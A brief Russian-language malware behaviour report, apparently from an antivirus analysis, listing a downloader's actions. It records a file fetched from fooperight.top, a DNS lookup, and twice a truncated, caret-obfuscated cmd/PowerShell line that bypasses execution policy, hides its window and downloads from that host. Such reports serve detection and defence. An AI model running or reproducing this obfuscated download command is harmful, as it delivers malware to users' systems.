Техническая информация
- http://fooperight.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^e^RsH^ell.^Ex^E -e^xeCu^t^IOn^P^oLIC^y byPAS^S ^-^n^o^p^R^Ofi^LE^ -WI^N^D^oWsTYLe ^Hi^Dd^en ^(NeW-O^b^jEc^T ^SY^S^teM.n^ET.We^Bcl^I^EN^T)^.dowNLo^ADfIlE('http://foope...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^e^RsH^ell.^Ex^E -e^xeCu^t^IOn^P^oLIC^y byPAS^S ^-^n^o^p^R^Ofi^LE^ -WI^N^D^oWsTYLe ^Hi^Dd^en ^(NeW-O^b^jEc^T ^SY^S^teM.n^ET.We^Bcl^I^EN^T)^.dowNLo^ADfIlE('http://foope...' (со скрытым окном)